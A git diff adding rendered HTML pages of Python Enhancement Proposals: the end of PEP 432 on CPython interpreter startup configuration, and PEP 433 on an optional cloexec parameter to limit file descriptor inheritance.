As the new configuration settings are stored in the interpreter state, they +need to be initialised when a new subinterpreter is created. This turns out +to be trickier than one might expect due to PyThreadState_Swap(NULL); +(which is fortunately exercised by CPython’s own embedding tests, allowing +this problem to be detected during development).

+

To provide a straightforward solution for this case, the PEP proposes to +add a new API:

+
Py_InterpreterState *Py_InterpreterState_Main();
+
+
+

This will be a counterpart to Py_InterpreterState_Head(), only reporting the +oldest currently existing interpreter rather than the newest. If +Py_NewInterpreter() is called from a thread with an existing thread +state, then the interpreter configuration for that thread will be +used when initialising the new subinterpreter. If there is no current +thread state, the configuration from Py_InterpreterState_Main() +will be used.

+

While the existing Py_InterpreterState_Head() API could be used instead, +that reference changes as subinterpreters are created and destroyed, while +PyInterpreterState_Main() will always refer to the initial interpreter +state created in Py_InitializeRuntime().

+

A new constraint is also added to the embedding API: attempting to delete +the main interpreter while subinterpreters still exist will now be a fatal +error.

+
+
+

Stable ABI

+

Most of the APIs proposed in this PEP are excluded from the stable ABI, as +embedding a Python interpreter involves a much higher degree of coupling +than merely writing an extension module.

+

The only newly exposed APIs that will be part of the stable ABI are the +Py_IsInitializing() and Py_IsRuntimeInitialized() queries.

+
+
+

Build time configuration

+

This PEP makes no changes to the handling of build time configuration +settings, and thus has no effect on the contents of sys.implementation +or the result of sysconfig.get_config_vars().

+
+
+

Backwards Compatibility

+

Backwards compatibility will be preserved primarily by ensuring that +Py_BuildPythonConfig() interrogates all the previously defined +configuration settings stored in global variables and environment variables, +and that Py_InitializeMainInterpreter() writes affected settings back to +the relevant locations.

+

One acknowledged incompatibility is that some environment variables which +are currently read lazily may instead be read once during interpreter +initialization. As the reference implementation matures, these will be +discussed in more detail on a case-by-case basis. The environment variables +which are currently known to be looked up dynamically are:

+
    +
  • PYTHONCASEOK: writing to os.environ['PYTHONCASEOK'] will no longer +dynamically alter the interpreter’s handling of filename case differences +on import (TBC)
  • +
  • PYTHONINSPECT: os.environ['PYTHONINSPECT'] will still be checked +after execution of the __main__ module terminates
  • +
+

The Py_Initialize() style of initialization will continue to be +supported. It will use (at least some elements of) the new API +internally, but will continue to exhibit the same behaviour as it +does today, ensuring that sys.argv is not populated until a subsequent +PySys_SetArgv call (TBC). All APIs that currently support being called +prior to Py_Initialize() will +continue to do so, and will also support being called prior to +Py_InitializeRuntime().

+
+
+
+

A System Python Executable

+

When executing system utilities with administrative access to a system, many +of the default behaviours of CPython are undesirable, as they may allow +untrusted code to execute with elevated privileges. The most problematic +aspects are the fact that user site directories are enabled, +environment variables are trusted and that the directory containing the +executed file is placed at the beginning of the import path.

+

Issue 16499 [6] added a -I option to change the behaviour of +the normal CPython executable, but this is a hard to discover solution (and +adds yet another option to an already complex CLI). This PEP proposes to +instead add a separate system-python executable

+

Currently, providing a separate executable with different default behaviour +would be prohibitively hard to maintain. One of the goals of this PEP is to +make it possible to replace much of the hard to maintain bootstrapping code +with more normal CPython code, as well as making it easier for a separate +application to make use of key components of Py_Main. Including this +change in the PEP is designed to help avoid acceptance of a design that +sounds good in theory but proves to be problematic in practice.

+

Cleanly supporting this kind of “alternate CLI” is the main reason for the +proposed changes to better expose the core logic for deciding between the +different execution modes supported by CPython:

+
    +
  • script execution
  • +
  • directory/zipfile execution
  • +
  • command execution (“-c” switch)
  • +
  • module or package execution (“-m” switch)
  • +
  • execution from stdin (non-interactive)
  • +
  • interactive stdin
  • +
+

Actually implementing this may also reveal the need for some better +argument parsing infrastructure for use during the initializing phase.

+
+
+

Open Questions

+
    +
  • Error details for Py_BuildPythonConfig and +Py_InitializeMainInterpreter (these should become clearer as the +implementation progresses)
  • +
+
+
+

Implementation

+

The reference implementation is being developed as a private API refactoring +within the CPython reference interpreter (as attempting to maintain it as an +independent project proved impractical).

+

PEP 587 extracts a subset of the proposal that is considered sufficiently stable +to be worth proposing as a public API for Python 3.8.

+
+
+

The Status Quo (as of Python 3.6)

+

The current mechanisms for configuring the interpreter have accumulated in +a fairly ad hoc fashion over the past 20+ years, leading to a rather +inconsistent interface with varying levels of documentation.

+

Also see PEP 587 for further discussion of the existing settings and their +handling.

+

(Note: some of the info below could probably be cleaned up and added to the +C API documentation for 3.x - it’s all CPython specific, so it +doesn’t belong in the language reference)

+
+

Ignoring Environment Variables

+

The -E command line option allows all environment variables to be +ignored when initializing the Python interpreter. An embedding application +can enable this behaviour by setting Py_IgnoreEnvironmentFlag before +calling Py_Initialize().

+

In the CPython source code, the Py_GETENV macro implicitly checks this +flag, and always produces NULL if it is set.

+

<TBD: I believe PYTHONCASEOK is checked regardless of this setting > +<TBD: Does -E also ignore Windows registry keys? >

+
+
+

Randomised Hashing

+

The randomised hashing is controlled via the -R command line option (in +releases prior to 3.3), as well as the PYTHONHASHSEED environment +variable.

+

In Python 3.3, only the environment variable remains relevant. It can be +used to disable randomised hashing (by using a seed value of 0) or else +to force a specific hash value (e.g. for repeatability of testing, or +to share hash values between processes)

+

However, embedding applications must use the Py_HashRandomizationFlag +to explicitly request hash randomisation (CPython sets it in Py_Main() +rather than in Py_Initialize()).

+

The new configuration API should make it straightforward for an +embedding application to reuse the PYTHONHASHSEED processing with +a text based configuration setting provided by other means (e.g. a +config file or separate environment variable).

+
+
+

Locating Python and the standard library

+

The location of the Python binary and the standard library is influenced +by several elements. The algorithm used to perform the calculation is +not documented anywhere other than in the source code [3], [4]. Even that +description is incomplete, as it failed to be updated for the virtual +environment support added in Python 3.3 (detailed in PEP 405).

+

These calculations are affected by the following function calls (made +prior to calling Py_Initialize()) and environment variables:

+
    +
  • Py_SetProgramName()
  • +
  • Py_SetPythonHome()
  • +
  • PYTHONHOME
  • +
+

The filesystem is also inspected for pyvenv.cfg files (see PEP 405) or, +failing that, a lib/os.py (Windows) or lib/python$VERSION/os.py +file.

+

The build time settings for PREFIX and EXEC_PREFIX are also relevant, +as are some registry settings on Windows. The hardcoded fallbacks are +based on the layout of the CPython source tree and build output when +working in a source checkout.

+
+
+

Configuring sys.path

+

An embedding application may call Py_SetPath() prior to +Py_Initialize() to completely override the calculation of +sys.path. It is not straightforward to only allow some of the +calculations, as modifying sys.path after initialization is +already complete means those modifications will not be in effect +when standard library modules are imported during the startup sequence.

+

If Py_SetPath() is not used prior to the first call to Py_GetPath() +(implicit in Py_Initialize()), then it builds on the location data +calculations above to calculate suitable path entries, along with +the PYTHONPATH environment variable.

+

<TBD: On Windows, there’s also a bunch of stuff to do with the registry>

+

The site module, which is implicitly imported at startup (unless +disabled via the -S option) adds additional paths to this initial +set of paths, as described in its documentation [5].

+

The -s command line option can be used to exclude the user site +directory from the list of directories added. Embedding applications +can control this by setting the Py_NoUserSiteDirectory global variable.

+

The following commands can be used to check the default path configurations +for a given Python executable on a given system:

+
    +
  • ./python -c "import sys, pprint; pprint.pprint(sys.path)" +- standard configuration
  • +
  • ./python -s -c "import sys, pprint; pprint.pprint(sys.path)" +- user site directory disabled
  • +
  • ./python -S -c "import sys, pprint; pprint.pprint(sys.path)" +- all site path modifications disabled
  • +
+

(Note: you can see similar information using -m site instead of -c, +but this is slightly misleading as it calls os.abspath on all of the +path entries, making relative path entries look absolute. Using the site +module also causes problems in the last case, as on Python versions prior to +3.3, explicitly importing site will carry out the path modifications -S +avoids, while on 3.3+ combining -m site with -S currently fails)

+

The calculation of sys.path[0] is comparatively straightforward:

+
    +
  • For an ordinary script (Python source or compiled bytecode), +sys.path[0] will be the directory containing the script.
  • +
  • For a valid sys.path entry (typically a zipfile or directory), +sys.path[0] will be that path
  • +
  • For an interactive session, running from stdin or when using the -c or +-m switches, sys.path[0] will be the empty string, which the import +system interprets as allowing imports from the current directory
  • +
+
+
+

Configuring sys.argv

+

Unlike most other settings discussed in this PEP, sys.argv is not +set implicitly by Py_Initialize(). Instead, it must be set via an +explicitly call to Py_SetArgv().

+

CPython calls this in Py_Main() after calling Py_Initialize(). The +calculation of sys.argv[1:] is straightforward: they’re the command line +arguments passed after the script name or the argument to the -c or +-m options.

+

The calculation of sys.argv[0] is a little more complicated:

+
    +
  • For an ordinary script (source or bytecode), it will be the script name
  • +
  • For a sys.path entry (typically a zipfile or directory) it will +initially be the zipfile or directory name, but will later be changed by +the runpy module to the full path to the imported __main__ module.
  • +
  • For a module specified with the -m switch, it will initially be the +string "-m", but will later be changed by the runpy module to the +full path to the executed module.
  • +
  • For a package specified with the -m switch, it will initially be the +string "-m", but will later be changed by the runpy module to the +full path to the executed __main__ submodule of the package.
  • +
  • For a command executed with -c, it will be the string "-c"
  • +
  • For explicitly requested input from stdin, it will be the string "-"
  • +
  • Otherwise, it will be the empty string
  • +
+

Embedding applications must call Py_SetArgv themselves. The CPython logic +for doing so is part of Py_Main() and is not exposed separately. +However, the runpy module does provide roughly equivalent logic in +runpy.run_module and runpy.run_path.

+
+
+

Other configuration settings

+

TBD: Cover the initialization of the following in more detail:

+
    +
  • Completely disabling the import system
  • +
  • The initial warning system state:
      +
    • sys.warnoptions
    • +
    • (-W option, PYTHONWARNINGS)
    • +
    +
  • +
  • Arbitrary extended options (e.g. to automatically enable faulthandler):
      +
    • sys._xoptions
    • +
    • (-X option)
    • +
    +
  • +
  • The filesystem encoding used by:
      +
    • sys.getfsencoding
    • +
    • os.fsencode
    • +
    • os.fsdecode
    • +
    +
  • +
  • The IO encoding and buffering used by:
      +
    • sys.stdin
    • +
    • sys.stdout
    • +
    • sys.stderr
    • +
    • (-u option, PYTHONIOENCODING, PYTHONUNBUFFEREDIO)
    • +
    +
  • +
  • Whether or not to implicitly cache bytecode files:
      +
    • sys.dont_write_bytecode
    • +
    • (-B option, PYTHONDONTWRITEBYTECODE)
    • +
    +
  • +
  • Whether or not to enforce correct case in filenames on case-insensitive +platforms
      +
    • os.environ["PYTHONCASEOK"]
    • +
    +
  • +
  • The other settings exposed to Python code in sys.flags:
      +
    • debug (Enable debugging output in the pgen parser)
    • +
    • inspect (Enter interactive interpreter after __main__ terminates)
    • +
    • interactive (Treat stdin as a tty)
    • +
    • optimize (__debug__ status, write .pyc or .pyo, strip doc strings)
    • +
    • no_user_site (don’t add the user site directory to sys.path)
    • +
    • no_site (don’t implicitly import site during startup)
    • +
    • ignore_environment (whether environment vars are used during config)
    • +
    • verbose (enable all sorts of random output)
    • +
    • bytes_warning (warnings/errors for implicit str/bytes interaction)
    • +
    • quiet (disable banner output even if verbose is also enabled or +stdin is a tty and the interpreter is launched in interactive mode)
    • +
    +
  • +
  • Whether or not CPython’s signal handlers should be installed
  • +
+

Much of the configuration of CPython is currently handled through C level +global variables:

+
Py_BytesWarningFlag (-b)
+Py_DebugFlag (-d option)
+Py_InspectFlag (-i option, PYTHONINSPECT)
+Py_InteractiveFlag (property of stdin, cannot be overridden)
+Py_OptimizeFlag (-O option, PYTHONOPTIMIZE)
+Py_DontWriteBytecodeFlag (-B option, PYTHONDONTWRITEBYTECODE)
+Py_NoUserSiteDirectory (-s option, PYTHONNOUSERSITE)
+Py_NoSiteFlag (-S option)
+Py_UnbufferedStdioFlag (-u, PYTHONUNBUFFEREDIO)
+Py_VerboseFlag (-v option, PYTHONVERBOSE)
+
+
+

For the above variables, the conversion of command line options and +environment variables to C global variables is handled by Py_Main, +so each embedding application must set those appropriately in order to +change them from their defaults.

+

Some configuration can only be provided as OS level environment variables:

+
PYTHONSTARTUP
+PYTHONCASEOK
+PYTHONIOENCODING
+
+
+

The Py_InitializeEx() API also accepts a boolean flag to indicate +whether or not CPython’s signal handlers should be installed.

+

Finally, some interactive behaviour (such as printing the introductory +banner) is triggered only when standard input is reported as a terminal +connection by the operating system.

+

TBD: Document how the “-x” option is handled (skips processing of the +first comment line in the main script)

+

Also see detailed sequence of operations notes at [1].

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0432.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0433/index.html b/pep-0433/index.html new file mode 100644 index 00000000000..83e2c6506ce --- /dev/null +++ b/pep-0433/index.html @@ -0,0 +1,849 @@ + + + + + + + + PEP 433 – Easier suppression of file descriptor inheritance | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 433 – Easier suppression of file descriptor inheritance

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
10-Jan-2013
+
Python-Version:
+
3.4
+
Superseded-By:
+
446
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a new optional cloexec parameter on functions creating file +descriptors, add different ways to change default values of this +parameter, and add four new functions:

+
    +
  • os.get_cloexec(fd)
  • +
  • os.set_cloexec(fd, cloexec=True)
  • +
  • sys.getdefaultcloexec()
  • +
  • sys.setdefaultcloexec(cloexec)
  • +
+
+
+

Rationale

+

A file descriptor has a close-on-exec flag which indicates if the file +descriptor will be inherited or not.

+

On UNIX, if the close-on-exec flag is set, the file descriptor is not +inherited: it will be closed at the execution of child processes; +otherwise the file descriptor is inherited by child processes.

+

On Windows, if the close-on-exec flag is set, the file descriptor is not +inherited; the file descriptor is inherited by child processes if the +close-on-exec flag is cleared and if CreateProcess() is called with +the bInheritHandles parameter set to TRUE (when +subprocess.Popen is created with close_fds=False for example). +Windows does not have “close-on-exec” flag but an inheritance flag which +is just the opposite value. For example, setting close-on-exec flag +means clearing the HANDLE_FLAG_INHERIT flag of a handle.

+
+

Status in Python 3.3

+

On UNIX, the subprocess module closes file descriptors greater than 2 by +default since Python 3.2 [1]. All file descriptors +created by the parent process are automatically closed in the child +process.

+

xmlrpc.server.SimpleXMLRPCServer sets the close-on-exec flag of +the listening socket, the parent class socketserver.TCPServer +does not set this flag.

+

There are other cases creating a subprocess or executing a new program +where file descriptors are not closed: functions of the os.spawn*() +and the os.exec*() families and third party modules calling +exec() or fork() + exec(). In this case, file descriptors +are shared between the parent and the child processes which is usually +unexpected and causes various issues.

+

This PEP proposes to continue the work started with the change in the +subprocess in Python 3.2, to fix the issue in any code, and not just +code using subprocess.

+
+
+

Inherited file descriptors issues

+

Closing the file descriptor in the parent process does not close the +related resource (file, socket, …) because it is still open in the +child process.

+

The listening socket of TCPServer is not closed on exec(): the child +process is able to get connection from new clients; if the parent closes +the listening socket and create a new listening socket on the same +address, it would get an “address already is used” error.

+

Not closing file descriptors can lead to resource exhaustion: even if +the parent closes all files, creating a new file descriptor may fail +with “too many files” because files are still open in the child process.

+

See also the following issues:

+ +
+
+

Security

+

Leaking file descriptors is a major security vulnerability. An +untrusted child process can read sensitive data like passwords and +take control of the parent process though leaked file descriptors. It +is for example a known vulnerability to escape from a chroot.

+

See also the CERT recommendation: +FIO42-C. Ensure files are properly closed when they are no longer needed.

+

Example of vulnerabilities:

+ +
+
+

Atomicity

+

Using fcntl() to set the close-on-exec flag is not safe in a +multithreaded application. If a thread calls fork() and exec() +between the creation of the file descriptor and the call to +fcntl(fd, F_SETFD, new_flags): the file descriptor will be +inherited by the child process. Modern operating systems offer +functions to set the flag during the creation of the file descriptor, +which avoids the race condition.

+
+
+

Portability

+

Python 3.2 added socket.SOCK_CLOEXEC flag, Python 3.3 added +os.O_CLOEXEC flag and os.pipe2() function. It is already +possible to set atomically close-on-exec flag in Python 3.3 when +opening a file and creating a pipe or socket.

+

The problem is that these flags and functions are not portable: only +recent versions of operating systems support them. O_CLOEXEC and +SOCK_CLOEXEC flags are ignored by old Linux versions and so +FD_CLOEXEC flag must be checked using fcntl(fd, F_GETFD). If +the kernel ignores O_CLOEXEC or SOCK_CLOEXEC flag, a call to +fcntl(fd, F_SETFD, flags) is required to set close-on-exec flag.

+
+

Note

+

OpenBSD older 5.2 does not close the file descriptor with +close-on-exec flag set if fork() is used before exec(), but +it works correctly if exec() is called without fork(). Try +openbsd_bug.py.

+
+
+
+

Scope

+

Applications still have to close explicitly file descriptors after a +fork(). The close-on-exec flag only closes file descriptors after +exec(), and so after fork() + exec().

+

This PEP only change the close-on-exec flag of file descriptors +created by the Python standard library, or by modules using the +standard library. Third party modules not using the standard library +should be modified to conform to this PEP. The new +os.set_cloexec() function can be used for example.

+
+

Note

+

See Close file descriptors after fork for a possible solution +for fork() without exec().

+
+
+
+
+

Proposal

+

Add a new optional cloexec parameter on functions creating file +descriptors and different ways to change default value of this +parameter.

+

Add new functions:

+
    +
  • os.get_cloexec(fd:int) -> bool: get the +close-on-exec flag of a file descriptor. Not available on all +platforms.
  • +
  • os.set_cloexec(fd:int, cloexec:bool=True): set or clear the +close-on-exec flag on a file descriptor. Not available on all +platforms.
  • +
  • sys.getdefaultcloexec() -> bool: get the current default value +of the cloexec parameter
  • +
  • sys.setdefaultcloexec(cloexec: bool): set the default value +of the cloexec parameter
  • +
+

Add a new optional cloexec parameter to:

+
    +
  • asyncore.dispatcher.create_socket()
  • +
  • io.FileIO
  • +
  • io.open()
  • +
  • open()
  • +
  • os.dup()
  • +
  • os.dup2()
  • +
  • os.fdopen()
  • +
  • os.open()
  • +
  • os.openpty()
  • +
  • os.pipe()
  • +
  • select.devpoll()
  • +
  • select.epoll()
  • +
  • select.kqueue()
  • +
  • socket.socket()
  • +
  • socket.socket.accept()
  • +
  • socket.socket.dup()
  • +
  • socket.socket.fromfd
  • +
  • socket.socketpair()
  • +
+

The default value of the cloexec parameter is +sys.getdefaultcloexec().

+

Add a new command line option -e and an environment variable +PYTHONCLOEXEC to the set close-on-exec flag by default.

+

subprocess clears the close-on-exec flag of file descriptors of the +pass_fds parameter.

+

All functions creating file descriptors in the standard library must +respect the default value of the cloexec parameter: +sys.getdefaultcloexec().

+

File descriptors 0 (stdin), 1 (stdout) and 2 (stderr) are expected to be +inherited, but Python does not handle them differently. When +os.dup2() is used to replace standard streams, cloexec=False +must be specified explicitly.

+

Drawbacks of the proposal:

+
    +
  • It is not more possible to know if the close-on-exec flag will be +set or not on a newly created file descriptor just by reading the +source code.
  • +
  • If the inheritance of a file descriptor matters, the cloexec +parameter must now be specified explicitly, or the library or the +application will not work depending on the default value of the +cloexec parameter.
  • +
+
+
+

Alternatives

+
+

Inheritance enabled by default, default no configurable

+

Add a new optional parameter cloexec on functions creating file +descriptors. The default value of the cloexec parameter is False, +and this default cannot be changed. File descriptor inheritance enabled by +default is also the default on POSIX and on Windows. This alternative is +the most conservative option.

+

This option does not solve issues listed in the Rationale +section, it only provides a helper to fix them. All functions creating +file descriptors have to be modified to set cloexec=True in each +module used by an application to fix all these issues.

+
+
+

Inheritance enabled by default, default can only be set to True

+

This alternative is based on the proposal: the only difference is that +sys.setdefaultcloexec() does not take any argument, it can only be +used to set the default value of the cloexec parameter to True.

+
+
+

Disable inheritance by default

+

This alternative is based on the proposal: the only difference is that +the default value of the cloexec parameter is True (instead of +False).

+

If a file must be inherited by child processes, cloexec=False +parameter can be used.

+

Advantages of setting close-on-exec flag by default:

+ +

Drawbacks of setting close-on-exec flag by default:

+
    +
  • It violates the principle of least surprise. Developers using the +os module may expect that Python respects the POSIX standard and so +that close-on-exec flag is not set by default.
  • +
  • The os module is written as a thin wrapper to system calls (to +functions of the C standard library). If atomic flags to set +close-on-exec flag are not supported (see Appendix: Operating +system support), a single Python function call may call 2 or 3 +system calls (see Performances section).
  • +
  • Extra system calls, if any, may slow down Python: see +Performances.
  • +
+

Backward compatibility: only a few programs rely on inheritance of file +descriptors, and they only pass a few file descriptors, usually just +one. These programs will fail immediately with EBADF error, and it +will be simple to fix them: add cloexec=False parameter or use +os.set_cloexec(fd, False).

+

The subprocess module will be changed anyway to clear +close-on-exec flag on file descriptors listed in the pass_fds +parameter of Popen constructor. So it possible that these programs will +not need any fix if they use the subprocess module.

+
+
+

Close file descriptors after fork

+

This PEP does not fix issues with applications using fork() +without exec(). Python needs a generic process to register +callbacks which would be called after a fork, see #16500: +Add an atfork module. Such registry could be used to close file +descriptors just after a fork().

+

Drawbacks:

+
    +
  • It does not solve the problem on Windows: fork() does not exist +on Windows
  • +
  • This alternative does not solve the problem for programs using +exec() without fork().
  • +
  • A third party module may call directly the C function fork() +which will not call “atfork” callbacks.
  • +
  • All functions creating file descriptors must be changed to register +a callback and then unregister their callback when the file is +closed. Or a list of all open file descriptors must be +maintained.
  • +
  • The operating system is a better place than Python to close +automatically file descriptors. For example, it is not easy to +avoid a race condition between closing the file and unregistering +the callback closing the file.
  • +
+
+
+

open(): add “e” flag to mode

+

A new “e” mode would set close-on-exec flag (best-effort).

+

This alternative only solves the problem for open(). +socket.socket() and os.pipe() do not have a mode parameter for +example.

+

Since its version 2.7, the GNU libc supports "e" flag for +fopen(). It uses O_CLOEXEC if available, or use fcntl(fd, +F_SETFD, FD_CLOEXEC). With Visual Studio, fopen() accepts a “N” +flag which uses O_NOINHERIT.

+
+
+

Bikeshedding on the name of the new parameter

+
    +
  • inherit, inherited: closer to Windows definition
  • +
  • sensitive
  • +
  • sterile: “Does not produce offspring.”
  • +
+
+
+
+

Applications using inheritance of file descriptors

+

Most developers don’t know that file descriptors are inherited by +default. Most programs do not rely on inheritance of file descriptors. +For example, subprocess.Popen was changed in Python 3.2 to close +all file descriptors greater than 2 in the child process by default. +No user complained about this behavior change yet.

+

Network servers using fork may want to pass the client socket to the +child process. For example, on UNIX a CGI server pass the socket +client through file descriptors 0 (stdin) and 1 (stdout) using +dup2().

+

To access a restricted resource like creating a socket listening on a +TCP port lower than 1024 or reading a file containing sensitive data +like passwords, a common practice is: start as the root user, create a +file descriptor, create a child process, drop privileges (ex: change the +current user), pass the file descriptor to the child process and exit +the parent process.

+

Security is very important in such use case: leaking another file +descriptor would be a critical security vulnerability (see Security). +The root process may not exit but monitors the child process instead, +and restarts a new child process and pass the same file descriptor if +the previous child process crashed.

+

Example of programs taking file descriptors from the parent process +using a command line option:

+
    +
  • gpg: --status-fd <fd>, --logger-fd <fd>, etc.
  • +
  • openssl: -pass fd:<fd>
  • +
  • qemu: -add-fd <fd>
  • +
  • valgrind: --log-fd=<fd>, --input-fd=<fd>, etc.
  • +
  • xterm: -S <fd>
  • +
+

On Linux, it is possible to use "/dev/fd/<fd>" filename to pass a +file descriptor to a program expecting a filename.

+
+
+

Performances

+

Setting close-on-exec flag may require additional system calls for +each creation of new file descriptors. The number of additional system +calls depends on the method used to set the flag:

+
    +
  • O_NOINHERIT: no additional system call
  • +
  • O_CLOEXEC: one additional system call, but only at the creation +of the first file descriptor, to check if the flag is supported. If +the flag is not supported, Python has to fallback to the next method.
  • +
  • ioctl(fd, FIOCLEX): one additional system call per file +descriptor
  • +
  • fcntl(fd, F_SETFD, flags): two additional system calls per file +descriptor, one to get old flags and one to set new flags
  • +
+

On Linux, setting the close-on-flag has a low overhead on performances. +Results of +bench_cloexec.py +on Linux 3.6:

+
    +
  • close-on-flag not set: 7.8 us
  • +
  • O_CLOEXEC: 1% slower (7.9 us)
  • +
  • ioctl(): 3% slower (8.0 us)
  • +
  • fcntl(): 3% slower (8.0 us)
  • +
+
+
+

Implementation

+
+

os.get_cloexec(fd)

+

Get the close-on-exec flag of a file descriptor.

+

Pseudo-code:

+
if os.name == 'nt':
+    def get_cloexec(fd):
+        handle = _winapi._get_osfhandle(fd);
+        flags = _winapi.GetHandleInformation(handle)
+        return not(flags & _winapi.HANDLE_FLAG_INHERIT)
+else:
+    try:
+        import fcntl
+    except ImportError:
+        pass
+    else:
+        def get_cloexec(fd):
+            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
+            return bool(flags & fcntl.FD_CLOEXEC)
+
+
+
+
+

os.set_cloexec(fd, cloexec=True)

+

Set or clear the close-on-exec flag on a file descriptor. The flag +is set after the creation of the file descriptor and so it is not +atomic.

+

Pseudo-code:

+
if os.name == 'nt':
+    def set_cloexec(fd, cloexec=True):
+        handle = _winapi._get_osfhandle(fd);
+        mask = _winapi.HANDLE_FLAG_INHERIT
+        if cloexec:
+            flags = 0
+        else:
+            flags = mask
+        _winapi.SetHandleInformation(handle, mask, flags)
+else:
+    fnctl = None
+    ioctl = None
+    try:
+        import ioctl
+    except ImportError:
+        try:
+            import fcntl
+        except ImportError:
+            pass
+    if ioctl is not None and hasattr('FIOCLEX', ioctl):
+        def set_cloexec(fd, cloexec=True):
+            if cloexec:
+                ioctl.ioctl(fd, ioctl.FIOCLEX)
+            else:
+                ioctl.ioctl(fd, ioctl.FIONCLEX)
+    elif fnctl is not None:
+        def set_cloexec(fd, cloexec=True):
+            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
+            if cloexec:
+                flags |= FD_CLOEXEC
+            else:
+                flags &= ~FD_CLOEXEC
+            fcntl.fcntl(fd, fcntl.F_SETFD, flags)
+
+
+

ioctl is preferred over fcntl because it requires only one syscall, +instead of two syscalls for fcntl.

+
+

Note

+

fcntl(fd, F_SETFD, flags) only supports one flag +(FD_CLOEXEC), so it would be possible to avoid fcntl(fd, +F_GETFD). But it may drop other flags in the future, and so it is +safer to keep the two functions calls.

+
+
+

Note

+

fopen() function of the GNU libc ignores the error if +fcntl(fd, F_SETFD, flags) failed.

+
+
+
+

open()

+
    +
  • Windows: open() with O_NOINHERIT flag [atomic]
  • +
  • open() with O_CLOEXEC flag [atomic]
  • +
  • open() + os.set_cloexec(fd, True) [best-effort]
  • +
+
+
+

os.dup()

+
    +
  • Windows: DuplicateHandle() [atomic]
  • +
  • fcntl(fd, F_DUPFD_CLOEXEC) [atomic]
  • +
  • dup() + os.set_cloexec(fd, True) [best-effort]
  • +
+
+
+

os.dup2()

+
    +
  • fcntl(fd, F_DUP2FD_CLOEXEC, fd2) [atomic]
  • +
  • dup3() with O_CLOEXEC flag [atomic]
  • +
  • dup2() + os.set_cloexec(fd, True) [best-effort]
  • +
+
+
+

os.pipe()

+
    +
  • Windows: CreatePipe() with +SECURITY_ATTRIBUTES.bInheritHandle=TRUE, or _pipe() with +O_NOINHERIT flag [atomic]
  • +
  • pipe2() with O_CLOEXEC flag [atomic]
  • +
  • pipe() + os.set_cloexec(fd, True) [best-effort]
  • +
+
+
+

socket.socket()

+
    +
  • Windows: WSASocket() with WSA_FLAG_NO_HANDLE_INHERIT flag +[atomic]
  • +
  • socket() with SOCK_CLOEXEC flag [atomic]
  • +
  • socket() + os.set_cloexec(fd, True) [best-effort]
  • +
+
+
+

socket.socketpair()

+
    +
  • socketpair() with SOCK_CLOEXEC flag [atomic]
  • +
  • socketpair() + os.set_cloexec(fd, True) [best-effort]
  • +
+
+
+

socket.socket.accept()

+
    +
  • accept4() with SOCK_CLOEXEC flag [atomic]
  • +
  • accept() + os.set_cloexec(fd, True) [best-effort]
  • +
+
+
+
+

Backward compatibility

+

There is no backward incompatible change. The default behaviour is +unchanged: the close-on-exec flag is not set by default.

+
+
+

Appendix: Operating system support

+
+

Windows

+

Windows has an O_NOINHERIT flag: “Do not inherit in child +processes”.

+

For example, it is supported by open() and _pipe().

+

The flag can be cleared using +SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0).

+

CreateProcess() has an bInheritHandles parameter: if it is +FALSE, the handles are not inherited. If it is TRUE, handles +with HANDLE_FLAG_INHERIT flag set are inherited. +subprocess.Popen uses close_fds option to define +bInheritHandles.

+
+
+

ioctl

+

Functions:

+
    +
  • ioctl(fd, FIOCLEX, 0): set the close-on-exec flag
  • +
  • ioctl(fd, FIONCLEX, 0): clear the close-on-exec flag
  • +
+

Availability: Linux, Mac OS X, QNX, NetBSD, OpenBSD, FreeBSD.

+
+
+

fcntl

+

Functions:

+
    +
  • flags = fcntl(fd, F_GETFD); fcntl(fd, F_SETFD, flags | FD_CLOEXEC): +set the close-on-exec flag
  • +
  • flags = fcntl(fd, F_GETFD); fcntl(fd, F_SETFD, flags & ~FD_CLOEXEC): +clear the close-on-exec flag
  • +
+

Availability: AIX, Digital UNIX, FreeBSD, HP-UX, IRIX, Linux, Mac OS +X, OpenBSD, Solaris, SunOS, Unicos.

+
+
+

Atomic flags

+

New flags:

+
    +
  • O_CLOEXEC: available on Linux (2.6.23), FreeBSD (8.3), +OpenBSD 5.0, Solaris 11, QNX, BeOS, next NetBSD release (6.1?). +This flag is part of POSIX.1-2008.
  • +
  • SOCK_CLOEXEC flag for socket() and socketpair(), +available on Linux 2.6.27, OpenBSD 5.2, NetBSD 6.0.
  • +
  • WSA_FLAG_NO_HANDLE_INHERIT flag for WSASocket(): supported +on Windows 7 with SP1, Windows Server 2008 R2 with SP1, and later
  • +
  • fcntl(): F_DUPFD_CLOEXEC flag, available on Linux 2.6.24, +OpenBSD 5.0, FreeBSD 9.1, NetBSD 6.0, Solaris 11. This flag is part +of POSIX.1-2008.
  • +
  • fcntl(): F_DUP2FD_CLOEXEC flag, available on FreeBSD 9.1 +and Solaris 11.
  • +
  • recvmsg(): MSG_CMSG_CLOEXEC, available on Linux 2.6.23, +NetBSD 6.0.
  • +
+

On Linux older than 2.6.23, O_CLOEXEC flag is simply ignored. So +we have to check that the flag is supported by calling fcntl(). If +it does not work, we have to set the flag using ioctl() or +fcntl().

+

On Linux older than 2.6.27, if the SOCK_CLOEXEC flag is set in the +socket type, socket() or socketpair() fail and errno is set +to EINVAL.

+

On Windows XPS3, WSASocket() with WSAEPROTOTYPE when +WSA_FLAG_NO_HANDLE_INHERIT flag is used.

+

New functions:

+
    +
  • dup3(): available on Linux 2.6.27 (and glibc 2.9)
  • +
  • pipe2(): available on Linux 2.6.27 (and glibc 2.9)
  • +
  • accept4(): available on Linux 2.6.28 (and glibc 2.10)
  • +
+

If accept4() is called on Linux older than 2.6.28, accept4() +returns -1 (fail) and errno is set to ENOSYS.

+
+
+ +
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0433.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
